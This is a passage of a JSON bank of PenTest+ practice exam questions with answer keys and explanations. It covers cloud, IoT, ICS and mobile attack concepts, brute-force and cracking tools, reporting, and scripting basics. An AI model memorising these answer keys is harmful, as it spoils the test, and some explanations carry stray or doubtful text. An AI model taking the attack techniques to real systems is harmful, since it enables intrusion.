    "question": "Jeff identifies the IP address contained in the content delivery network (CDN) configuration for his target organization. He knows that that server\u2019s content is replicated by the CDN, and that if he is able to conduct a denial-of-service attack on the host he will be able to take down his target\u2019s web presence. What type of attack is Jeff preparing to conduct?",
    "choice_a": "A side -channel attack",
    "choice_b": "A direct-to-origin attack",
    "choice_c": "A federation misconfiguration attack",
    "choice_d": "A metadata service attack",
    "correct_answer": "B",
    "explanation": "Jeff is preparing a direct-to-origin attack, which targets the underlying system or resource behind a load balancer, CDN, or other similar system. If he can create a denial-of-service condition, the front-end network or systems will not have the ability to get updates or data from it, allowing him to bypass the protections and resilience a load balancer or content delivery network provides. A side-channel attack in most cloud environments will focus on taking advantage of being on the same physical hardware. Federation misconfiguration attacks attempt to take advantage of an insecure configuration in the federation linkages between two organizations, and metadata service attacks leverage native services provided by cloud providers intended to allow easy queries about systems and running inside their environment such as hostnames, IP addresses, or other metadata about the instances.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      266,
      267,
      264,
      265,
      2
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 184,
    "question": "Claire knows that her target organization leverages a significant number of IoT devices and that she is likely to need to use one or more of them as pivot points for her penetration test. Which of the following is not a common concern when conducting a penetration test involving IoT devices?",
    "choice_a": "Impacts to availability",
    "choice_b": "Fragile environments",
    "choice_c": "Data leakage",
    "choice_d": "Data corruption",
    "correct_answer": "C",
    "explanation": "Although IoT devices may leak data due to the use of insecure protocols or data storage, that\u2019s a concern for the defender. Pentesters should actively be looking for that sort of opportunity! Claire knows that IoT devices may fail when scanned or compromised, and that this can cause issues. They may also be part of a fragile environment that may not be designed to handle scans, or where delayed responses or downtime may cause issues for her client. She also knows that data corruption may occur if devices are not behaving properly due to a penetration test and that in environments where IoT data is critical that this could be a real issue. Claire should carefully discuss this with her client and ensure that they understand the risks and how to constrain them if testing IoT devices is important to the pentest.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      283,
      161,
      2,
      3,
      249
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 185,
    "question": "Susan wants to use a web application vulnerability scanner to help map an organization\u2019s web presence and to identify existing vulnerabilities. Which of the following tools is best suited to her needs?",
    "choice_a": "Paros",
    "choice_b": "CUSpider",
    "choice_c": "Patator",
    "choice_d": "w3af",
    "correct_answer": "D",
    "explanation": "The Web Application Attack and Audit Framework (w3af) is a web application testing and exploit tool that can spider the site and test applications and other security issues that may exist there. The Paros proxy is an excellent web proxy tool often used by web application testers, but it isn\u2019t a full-fledged testing suite like w3af. CUSpider and other versions of Spider are tools used to find sensitive data on systems, and Patator is a brute-force tool.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      89,
      90,
      91,
      229,
      88
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 186,
    "question": "Madhuri has discovered that the organization she is conducting a penetration test against makes extensive use of industrial control systems to manage a manufacturing plant. Which of the following components is least likely to respond to her normal penetration testing tools like Nmap and Metasploit?",
    "choice_a": "RTUs",
    "choice_b": "Field devices",
    "choice_c": "PLCs",
    "choice_d": "Master stations",
    "correct_answer": "B",
    "explanation": "Field devices are controlled by remote terminal units (RTUs) or programmable logic controllers (PLCs), which are likely to connect to a network and accept commands from a master station or operator station. Field devices are often controlled via digital or analog commands from the RTUs and PLCs, and are thus not likely to use protocols or access methods that are supported by normal penetration testing tools.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      282,
      213,
      157,
      161,
      175
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 187,
    "question": "Ben wants to conduct a penetration test against a service that uses containers hosted by a cloud service provider. Which of the following targets is not typically part of the scope for a penetration test against a containerized environment?",
    "choice_a": "The application",
    "choice_b": "APIs used by the containers",
    "choice_c": "Databases used by the containers",
    "choice_d": "The underlying containerization service",
    "correct_answer": "D",
    "explanation": "Attacking the underlying cloud hosting provider\u2019s containerization service is typically prohibited by terms of service from the provider and is thus unlikely to be part of the scope for a penetration test of a cloud-hosted containerization service. The application running in the container, the APIs used by the containers, and databases they access are more likely to be part of the engagement.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      260,
      269,
      264,
      257,
      267
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 188,
    "question": "Jocelyn wants to conduct a resource exhaustion attack against her penetration testing target, which uses an autoscaling service architecture that leverages a content delivery network. What technique is most likely to help her succeed?",
    "choice_a": "A BLE attack",
    "choice_b": "A direct-to-origin attack",
    "choice_c": "An IPMI attack",
    "choice_d": "A VM escape attack",
    "correct_answer": "B",
    "explanation": "If Jocelyn wants to successfully cause a denial-of-service condition, her best bet is a direct-to-origin attack. Exhausting the resources for the source or origin server for the service is far more likely to be successful than attempting to take on the resources of a cloud-hosted content delivery network. BLE attacks are used against devices that use Bluetooth\u2019s low energy mode. IPMI is a set of interface specifications for remote management and monitoring for computer systems and isn\u2019t typically a target for a resource exhaustion attack. A VM escape attack might be useful if Jocelyn had already compromised a host and wanted to gain further access, but again it isn\u2019t a useful way to attack a service like the one that is described.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      266,
      161,
      284,
      2,
      11
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 189,
    "question": "Isabelle wants to gain access to a cloud infrastructure as a service environment. Which of the following is not a common technique to gain this type of access for a penetration test?",
    "choice_a": "Acquire an inadvertently exposed key through a public code repository.",
    "choice_b": "Use a brute-force tool against a harvested credential that requires two factors.",
    "choice_c": "Acquire an inadvertently exposed key through a misconfigured object store.",
    "choice_d": "Probe for incorrectly assigned permissions for a service or system.",
    "correct_answer": "B",
    "explanation": "Brute-forcing multifactor is the only item on this list that is not a common method of attempting to gain access to a cloud environment. Multifactor authentication is designed to be resistant to brute force, meaning that other means would be necessary to access an account that uses it.<br>Use the following scenario for questions 10\u201312.<br>Charleen has been tasked with the components of a penetration test that deal with mobile devices at a large client organization. She has been given a standard corporate device to test that uses the organization\u2019s base configuration for devices that are issued to employees. As part of her team, you\u2019ve been asked to provide input on the penetration testing process. Answer each of the following questions based on your knowledge about mobile device attacks, vulnerabilities, and analysis tools.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      200,
      262,
      174,
      213,
      3
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 190,
    "question": "Charleen wants to use a cloned image of a phone to see if she can access it using brute-force passcode-breaking techniques. Which of the following techniques will allow her to do this without an automatic wipe occurring if \u201cwipe after 10 passcode attempts\u201d is set for the device?",
    "choice_a": "Reverse engineering",
    "choice_b": "Containerization",
    "choice_c": "Sandbox analysis",
    "choice_d": "Rainbow tables",
    "correct_answer": "C",
    "explanation": "Charleen could place the device image in a controlled sandbox and make passcode attempts against it, resetting the device each time it wipes itself, allowing her to make many attempts. She could also run many copies in parallel to allow even faster brute-force attempts. Reverse engineering is used to analyze binaries and code and does not suit this purpose. Containerization is used to place applications in a virtualized environment, and rainbow tables are used to attack hashed passwords and aren\u2019t useful for this purpose, either.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      271,
      174,
      272,
      244,
      274
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 191,
    "question": "Charleen has determined that the organization she is testing uses certificate pinning for their web application. What technique is most likely to help her overcome this so that she can conduct an on-path attack?",
    "choice_a": "Social engineering",
    "choice_b": "Reverse engineering",
    "choice_c": "Using a flaw in object storage security",
    "choice_d": "Data exfiltration",
    "correct_answer": "A",
    "explanation": "Persuading a user to add an additional certificate to the system or device\u2019s certificate store is the only option from this list that will help to defeat certificate pinning. Reverse engineering might be useful to determine what system is pinned if the certificate store isn\u2019t available and the application is. Object storage security issues may provide access to data or a place to drop data, but there\u2019s nothing in the question to indicate that this would be a viable solution, and data exfiltration is a term that describes getting data out of an organization.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      272,
      271,
      198,
      200,
      3
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 192,
    "question": "Charleen wants to perform static code analysis of the mobile application her target installed on the device in her possession. Which of the following tools should she select?",
    "choice_a": "Objection",
    "choice_b": "MobSF",
    "choice_c": "Frida",
    "choice_d": "Burp Suite",
    "correct_answer": "B",
    "explanation": "MobSF is the only tool listed that provides static code analysis capabilities. Objection and Frida are used for JavaScript and library injection, and Burp Suite is an application testing suite.",
    "topic_id": 3,
    "practice_test_id": 7,
    "related_articles": [
      227,
      87,
      278,
      275,
      232
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 193,
    "question": "Alice is conducting a penetration test of an organization\u2019s AWS infrastructure. What tool should she select from the following list if she wants to exploit AWS?",
    "choice_a": "Pacu",
    "choice_b": "Cloud Custodian",
    "choice_c": "CloudBrute",
    "choice_d": "BashAWS",
    "correct_answer": "A",
    "explanation": "Pacu is a dedicated AWS exploitation and penetration testing framework. Cloud Custodian is a useful management tool that can be used to identify misconfigurations, CloudBrute is a cloud enumeration tool, and BashAWS was made up for this question.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      268,
      264,
      263,
      262,
      260
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 194,
    "question": "What type of attack focuses on accessing the underlying hardware in a shared cloud environment in order to gain information about other virtualized systems running on it?",
    "choice_a": "A direct-to-origin attack",
    "choice_b": "A watering hole attack",
    "choice_c": "A side-channel attack",
    "choice_d": "An object storage attack",
    "correct_answer": "C",
    "explanation": "Side-channel attacks attempt to gain information about other systems by gathering data from an underlying system or infrastructure rather than directly from the running virtual system itself. Direct-to-origin attacks attempt to identify the source system that powers a content delivery network or other scaling service to allow denial-of-service or resource exhaustion attacks to apply to a smaller, less capable target. Watering hole attacks are a social engineering attack that leverages a frequently used website to host malware as part of an attack. An object storage attack focuses on services like S3 in AWS and often looks for improperly set permissions or other flaws that can be leveraged.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      267,
      257,
      259,
      264,
      266
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 195,
    "question": "Isaac wants to test for insecure S3 storage buckets belonging to his target organization. What process can he use to test for this type of insecure configuration?",
    "choice_a": "Navigate to the bucket\u2019s URL using a web browser.",
    "choice_b": "Use APKX to automatically validate known buckets by name.",
    "choice_c": "Use a fuzzer to generate bucket names and test them using the fuzzer\u2019s testing capability.",
    "choice_d": "Conduct a direct-to-origin attack to find the original bucket source URL.",
    "correct_answer": "A",
    "explanation": "One of the simplest techniques to validate if a bucket is accessible is to simply navigate to the bucket\u2019s URL. If it provides a file listing, the bucket is not configured securely. APKX is an Android APK extractor tool. Fuzzers are used for software testing, not for bucket security testing, and direct-to-origin attacks attempt to bypass content delivery networks, load balancers, and similar tools to allow attacks directly against source systems for denial-of-service or resource exhaustion attacks.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      263,
      287,
      268,
      266,
      214
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 196,
    "question": "Jocelyn wants to conduct a credential harvesting attack against an organization. What technique is she most likely to employ to accomplish the attack?",
    "choice_a": "Vulnerability scanning",
    "choice_b": "Capturing data from other systems on the same physical host",
    "choice_c": "Sending a phishing email",
    "choice_d": "Using an SDK to access service configuration data",
    "correct_answer": "C",
    "explanation": "Credential harvesting can take many forms, but one of the most common options is to use a phishing attack to obtain credentials that can be used to access accounts and systems belonging to a target organization. Simply conducting vulnerability scanning will not result in credentials being obtained, capturing data from other systems on a shared underlying system is a side-channel attack and is unlikely to result in acquiring credentials, and SDKs may provide some useful information but are unlikely to directly provide credentials.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      196,
      197,
      198,
      183,
      262
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 197,
    "question": "Simone has been asked to check for IPMI interfaces on servers at her target organization. Where is she most likely to find IPMI interfaces to probe?",
    "choice_a": "In the organization\u2019s DMZ",
    "choice_b": "In a private data center VLAN",
    "choice_c": "In the organization\u2019s workstation VLAN",
    "choice_d": "On the organization\u2019s Wi-Fi network",
    "correct_answer": "B",
    "explanation": "Most organizations recognize that IPMI interfaces need additional protection and place them on a private VLAN in their data center. Additional access controls like VPN requirements or bastion hosts are also commonly used. IPMI interfaces should not be exposed in a DMZ or a workstation VLAN, let alone on a Wi-Fi network!",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      284,
      158,
      213,
      157,
      235
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 198,
    "question": "Selah wants to use a brute-force attack against the SSH service provided by one of her targets. Which of the following tools is not designed to brute-force services like this?",
    "choice_a": "Patator",
    "choice_b": "Hydra",
    "choice_c": "Medusa",
    "choice_d": "Minotaur",
    "correct_answer": "D",
    "explanation": "Patator, Hydra, and Medusa are all useful brute-forcing tools. Minotaur may be a great name for a penetration testing tool, but the authors of this book aren\u2019t aware of any tool named Minotaur that is used by pentesters!",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      244,
      170,
      174,
      241,
      243
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 199,
    "question": "After compromising a remote host, Cameron uses SSH to connect to port 4444 from his penetration testing workstation. What type of remote shell has he set up?",
    "choice_a": "A reverse shell",
    "choice_b": "A root shell",
    "choice_c": "A bind shell",
    "choice_d": "A blind shell",
    "correct_answer": "C",
    "explanation": "Cameron has set up a bind shell, which connects a shell to a service port. A reverse shell would have initiated a connection from the compromised host to his penetration testing workstation (or another system Cameron has access to). The question does not provide enough information to determine if the shell might be a root shell, and blind shell is not a common penetration testing term.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      250,
      249,
      251,
      254,
      329
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 200,
    "question": "Jim wants to crack the hashes from a password file he recovered during a penetration test. Which of the following methods will typically be fastest?",
    "choice_a": "John the Ripper",
    "choice_b": "Rainbow Road",
    "choice_c": "Hashcat",
    "choice_d": "CeWL",
    "correct_answer": "C",
    "explanation": "Hashcat would be the fastest when taking advantage of a powerful graphic card, and John the Ripper will typically be the slowest of the password cracking methods listed. CeWL is a word list or dictionary generator and isn\u2019t a password cracker, and Rainbow Road is not a penetration testing tool.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      243,
      174,
      245,
      248,
      170
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 201,
    "question": "Tom recently conducted a penetration test for a company that is regulated under PCI DSS. Two months after the test, the client asks for a letter documenting the test results for its compliance files. What type of report is the client requesting?",
    "choice_a": "Executive summary",
    "choice_b": "Penetration testing report",
    "choice_c": "Written testimony",
    "choice_d": "Attestation of findings",
    "correct_answer": "D",
    "explanation": "An attestation of findings is a certification provided by the penetration testers to document that they conducted a test and the results for compliance purposes.",
    "topic_id": 1,
    "practice_test_id": 4,
    "related_articles": [
      296,
      6,
      307,
      301,
      303
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 202,
    "question": "Wendy is reviewing the results of a penetration test and learns that her organization uses the same local administrator password on all systems. Which one of the following tools can help her resolve this issue?",
    "choice_a": "LAPS",
    "choice_b": "Nmap",
    "choice_c": "Nessus",
    "choice_d": "Metasploit",
    "correct_answer": "A",
    "explanation": "The Local Administrator Password Solution (LAPS) tool from Microsoft provides a method for randomizing local administrator account credentials through integration with Active Directory.",
    "topic_id": 1,
    "practice_test_id": 7,
    "related_articles": [
      293,
      292,
      298,
      296,
      305
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 203,
    "question": "Which one of the following is <i>not</i> a normal communication trigger for a penetration test?",
    "choice_a": "Discovery of a critical finding",
    "choice_b": "Completion of a testing stage",
    "choice_c": "Documentation of a new test",
    "choice_d": "Identification of prior compromise",
    "correct_answer": "C",
    "explanation": "The three common triggers for communication during a penetration test are the completion of a testing stage, the discovery of a critical finding, and the identification of indicators of prior compromise.",
    "topic_id": 1,
    "practice_test_id": 5,
    "related_articles": [
      290,
      289,
      291,
      26,
      38
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 204,
    "question": "Gary ran an Nmap scan of a system and discovered that it is listening on port 22 despite the fact that it should not be accepting SSH connections. What finding should he report?",
    "choice_a": "Shared local administrator credentials",
    "choice_b": "Unnecessary open services",
    "choice_c": "SQL injection vulnerability",
    "choice_d": "No multifactor authentication",
    "correct_answer": "B",
    "explanation": "The only conclusion that Gary can draw from this information is that the server is offering unnecessary services because it is listening for SSH connections when it should not be supporting that service.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      295,
      298,
      296,
      290,
      292
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 205,
    "question": "Tom\u2019s organization currently uses password-based authentication and would like to move to multifactor authentication. Which one of the following is an acceptable second factor?",
    "choice_a": "Security question",
    "choice_b": "PIN",
    "choice_c": "Smartphone app",
    "choice_d": "Passphrase",
    "correct_answer": "C",
    "explanation": "Passphrases, security questions, and PINs are all examples of knowledge-based authentication and would not provide multifactor authentication when paired with a password, another knowledge-based factor. Smartphone apps are an example of \u201csomething you have\u201d and are an acceptable alternative.",
    "topic_id": 1,
    "practice_test_id": 6,
    "related_articles": [
      294,
      292,
      1,
      298,
      305
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 206,
    "question": "Which one of the following items is not appropriate for the executive summary of a penetration testing report?",
    "choice_a": "Description of findings",
    "choice_b": "Statement of risk",
    "choice_c": "Plain language",
    "choice_d": "Technical detail",
    "correct_answer": "D",
    "explanation": "An executive summary should be written in a manner that makes it accessible to the layperson. It should not contain technical detail.",
    "topic_id": 1,
    "practice_test_id": 4,
    "related_articles": [
      296,
      299,
      305,
      302,
      301
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 207,
    "question": "Which one of the following activities is not commonly performed during the post-engagement cleanup phase?",
    "choice_a": "Remediation of vulnerabilities",
    "choice_b": "Removal of shells",
    "choice_c": "Removal of tester-created credentials",
    "choice_d": "Removal of tools",
    "correct_answer": "A",
    "explanation": "Vulnerability remediation is a follow-up activity and is not conducted as part of the test. The testers should, however, remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.",
    "topic_id": 5,
    "practice_test_id": 3,
    "related_articles": [
      306,
      154,
      122,
      12,
      120
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 208,
    "question": "Who is the most effective person to facilitate a lessons learned session after a penetration test?",
    "choice_a": "Team leader",
    "choice_b": "CIO",
    "choice_c": "Third party",
    "choice_d": "Client",
    "correct_answer": "C",
    "explanation": "The most effective way to conduct a lessons learned session is to ask a neutral third party to serve as the facilitator, allowing everyone to express their opinions freely.",
    "topic_id": 1,
    "practice_test_id": 4,
    "related_articles": [
      307,
      291,
      8,
      301,
      296
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 209,
    "question": "Which one of the following is <i>not</i> an example of an operational control that might be implemented to remediate an issue discovered during a penetration test?",
    "choice_a": "Job rotation",
    "choice_b": "Time-of-day login restrictions",
    "choice_c": "Network segmentation",
    "choice_d": "User training",
    "correct_answer": "C",
    "explanation": "Network segmentation is an example of a technical control. Time-of-day restrictions, job rotation, and user training are all examples of operational controls.",
    "topic_id": 1,
    "practice_test_id": 5,
    "related_articles": [
      292,
      293,
      294,
      297,
      305
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 210,
    "question": "Which one of the following techniques is <i>not</i> an appropriate remediation activity for a SQL injection vulnerability?",
    "choice_a": "Network firewall",
    "choice_b": "Input sanitization",
    "choice_c": "Input validation",
    "choice_d": "Parameterized queries",
    "correct_answer": "A",
    "explanation": "Input sanitization (also known as input validation) and parameterized queries are both acceptable means for preventing SQL injection attacks. Network firewalls generally would not prevent such an attack.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      294,
      298,
      292,
      295,
      7
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 211,
    "question": "When should system hardening activities take place?",
    "choice_a": "When the system is initially built",
    "choice_b": "When the system is initially built and periodically during its life",
    "choice_c": "When the system is initially built and when it is decommissioned",
    "choice_d": "When the system is initially built, periodically during its life, and when it is decommissioned",
    "correct_answer": "B",
    "explanation": "System hardening should take place when a system is initially built and periodically during its life. There is no need to harden a system prior to decommissioning because it is being shut down at that point.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      295,
      9,
      7,
      45,
      298
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 212,
    "question": "Biometric authentication technology fits into what multifactor authentication category?",
    "choice_a": "Something you know",
    "choice_b": "Something you are",
    "choice_c": "Somewhere you are",
    "choice_d": "Something you have",
    "correct_answer": "B",
    "explanation": "Biometric authentication techniques use a measurement of some physical characteristic of the user, such as a fingerprint scan, facial recognition, or voice analysis.",
    "topic_id": 1,
    "practice_test_id": 3,
    "related_articles": [
      294,
      292,
      1,
      296,
      298
    ],
    "source": "285006_Ch11"
  },
  {
    "id": 213,
    "question": "Which of the following operating systems support PowerShell interpreters?",
    "choice_a": "Linux",
    "choice_b": "macOS",
    "choice_c": "Windows",
    "choice_d": "All of the above",
    "correct_answer": "D",
    "explanation": "PowerShell interpreters are available on all major platforms, including Windows, macOS, and many popular Linux variants.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      308,
      310,
      318,
      321,
      325
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 214,
    "question": "Which of the following PowerShell modules is used for network situational awareness, allowing penetration testers to enumerate domain users, groups, and permissions within an Active Directory environment?",
    "choice_a": "PowerUpSQL",
    "choice_b": "Empire",
    "choice_c": "PowerView",
    "choice_d": "PowerSploit",
    "correct_answer": "C",
    "explanation": "PowerView is the correct module for network situational awareness in an Active Directory (AD) environment, allowing penetration testers to enumerate domain users, groups, and permissions. It is designed specifically for gathering information about AD environments. PowerUpSQL is focused on SQL Server exploitation and does not provide AD enumeration capabilities. Empire is a post-exploitation framework but not a PowerShell module specifically for Active Directory enumeration. PowerSploit is a toolkit for various exploitation tasks, including privilege escalation and code execution, but it isn\u2019t dedicated to network situational awareness in AD.",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      16,
      327,
      10,
      316,
      326
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 215,
    "question": "Examine the following line of code. In what programming language is it written?<br>Write-Host \"The system contains several serious vulnerabilities.\"",
    "choice_a": "Perl",
    "choice_b": "PowerShell",
    "choice_c": "JavaScript",
    "choice_d": "Python",
    "correct_answer": "B",
    "explanation": "As you prepare for the exam, you should be able to identify the programming language used in code snippets. The <code>Write-Host</code> command is used to generate output in PowerShell.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      308,
      319,
      325,
      311,
      204
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 216,
    "question": "Which one of the following statements does not correctly describe the Python programming language?",
    "choice_a": "It is a general-purpose programming language.",
    "choice_b": "It is an interpreted language.",
    "choice_c": "It uses scripts.",
    "choice_d": "It is a compiled language.",
    "correct_answer": "D",
    "explanation": "Python is a general-purpose programming language. It is an interpreted language that uses scripts, rather than a compiled language that uses source code to generate executable files.",
    "topic_id": 2,
    "practice_test_id": 1,
    "related_articles": [
      312,
      317,
      327,
      328,
      326
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 217,
    "question": "Which one of the following commands will allow the file owner to execute a Bash script?",
    "choice_a": "<code>chmod o+e script.sh</code>",
    "choice_b": "<code>chmod o+x script.sh</code>",
    "choice_c": "<code>chmod u+e script.sh</code>",
    "choice_d": "<code>chmod u+x script.sh</code>",
    "correct_answer": "D",
    "explanation": "You must set the user (owner) bit to execute (<code>x</code>) to allow the execution of a Bash script. The <code>chmod u+x</code> command performs this task.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      309,
      308,
      233,
      318,
      321
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 218,
    "question": "Which one of the following PowerShell execution policies allows the execution of any PowerShell script that you write on the local machine but requires that scripts downloaded from the Internet be signed by a trusted publisher?",
    "choice_a": "<code>Bypass</code>",
    "choice_b": "<code>Unrestricted</code>",
    "choice_c": "<code>RemoteSigned</code>",
    "choice_d": "<code>AllSigned</code>",
    "correct_answer": "C",
    "explanation": "The <code>RemoteSigned</code> policy allows the execution of any PowerShell script that you write on the local machine but requires that scripts downloaded from the Internet be signed by a trusted publisher.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      310,
      308,
      309,
      330,
      321
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 219,
    "question": "Which one of the following lines of code would create an array in a PowerShell script?",
    "choice_a": "<code>$ports = 22, 25, 80, 443</code>",
    "choice_b": "<code>ports = (22,25,80,443)</code>",
    "choice_c": "<code>ports = [22,25,80,443]</code>",
    "choice_d": "<code>$ports = [22,25,80,443]</code>",
    "correct_answer": "A",
    "explanation": "PowerShell requires the use of the <code>$</code> before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, and option C would work in Python.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      316,
      312,
      313,
      314,
      317
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 220,
    "question": "What comparison operator tests for equality in Python?",
    "choice_a": "<code>-eq</code>",
    "choice_b": "<code>-ne</code>",
    "choice_c": "<code>==</code>",
    "choice_d": "<code>!=</code>",
    "correct_answer": "C",
    "explanation": "The <code>== </code>operator tests for equality in Python. The <code>!=</code> operator tests for inequality in Python. The <code>-eq</code> operator tests for equality in Bash and PowerShell, and the <code>-ne</code> operator tests for inequality in those languages.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      318,
      308,
      319,
      322,
      325
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 221,
    "question": "What value would be used to encode a space in a URL string?",
    "choice_a": "<code>%20</code>",
    "choice_b": "<code>%21</code>",
    "choice_c": "<code>%22</code>",
    "choice_d": "<code>%23</code>",
    "correct_answer": "A",
    "explanation": "The <code>%20</code> value is used to URL-encode spaces using the percent encoding scheme.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      320,
      319,
      209,
      226,
      162
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 222,
    "question": "Which of the following tools simulates malware infections by attempting to spread throughout a network, testing the security of data centers and cloud environments?",
    "choice_a": "Atomic Red Team",
    "choice_b": "PowerView",
    "choice_c": "Infection Monkey",
    "choice_d": "Caldera",
    "correct_answer": "C",
    "explanation": "Infection Monkey is the tool that simulates malware infections by attempting to spread throughout a network, testing the security of data centers and cloud environments. It is designed to identify potential vulnerabilities by mimicking the behavior of real-world attacks. Atomic Red Team provides individual tests for specific attack techniques rather than simulating widespread infections. PowerView is used for network situational awareness and enumeration in Active Directory environments, not for malware simulation. Caldera is an automated adversary emulation system, but it focuses more on simulating tactics and techniques rather than network infection spreading.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      332,
      268,
      266,
      11,
      269
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 223,
    "question": "Which of the following sets of languages allow the direct concatenation of a string and an integer?",
    "choice_a": "Python and Bash",
    "choice_b": "Bash and PowerShell",
    "choice_c": "Python and PowerShell",
    "choice_d": "Python, Bash, and PowerShell",
    "correct_answer": "B",
    "explanation": "Bash and PowerShell allow the direct concatenation of strings and numeric values. Python requires the explicit conversion of numeric values to strings prior to concatenation.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      319,
      308,
      322,
      325,
      318
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 224,
    "question": "What is the limit to the number of <code>elif</code> clauses in a Bash script?",
    "choice_a": "1",
    "choice_b": "2",
    "choice_c": "10",
    "choice_d": "No limit",
    "correct_answer": "D",
    "explanation": "There is no limit to the number of <code>elif</code> clauses that may be included in a Bash script.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      321,
      309,
      322,
      318,
      325
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 225,
    "question": "Consider the following Python code:<br>if 1 == 1:<br>print(\"hello\")<br>elif 3 == 3:<br>print(\"hello\")<br>else:<br>print(\"hello\")<br>How many times will this code print the word \u201chello\u201d?",
    "choice_a": "0",
    "choice_b": "1",
    "choice_c": "2",
    "choice_d": "3",
    "correct_answer": "B",
    "explanation": "When using conditional execution, only one clause is executed. In this case, the code following the <code>if</code> clause will execute, making it impossible for the <code>elif</code> or <code>else</code> clause to execute.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      321,
      311,
      322,
      323,
      308
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 226,
    "question": "Analyze the following segment of code:<br>Do {<br>$test='mike' + $i <br>$cracked = Test-Password $test <br>$i++<br>}<br>While($cracked -<code>eq 0)</code><br>In what language is this code written?",
    "choice_a": "Ruby",
    "choice_b": "PowerShell",
    "choice_c": "Python",
    "choice_d": "Bash",
    "correct_answer": "B",
    "explanation": "Use below flowchart to answer this question.<img src=\"/question_assets/PenTest+/figure_12_3.png\"/> The code contains a <code>Do</code> statement, so it is written in PowerShell.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      308,
      321,
      322,
      311,
      329
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 227,
    "question": "Analyze the following segment of code:<br>if [ $weekday==1 ]<br>then <br>/usr/local/bin/nmap 192.168.1.1 <br>elif [ $weekday==3 ]<br>then <br>/usr/local/bin/nmap 192.168.1.2 <br>else <br>/usr/local/bin/nmap 192.168.1.0/24 <br>fi <br>In what language is this code written?",
    "choice_a": "Ruby",
    "choice_b": "PowerShell",
    "choice_c": "Python",
    "choice_d": "Bash",
    "correct_answer": "D",
    "explanation": "Use below flowchart to answer this question.<img src=\"/question_assets/PenTest+/figure_12_1.png\"/> The code contains a <code>fi</code> statement, so it is written in Bash.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      312,
      315,
      327,
      313,
      324
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 228,
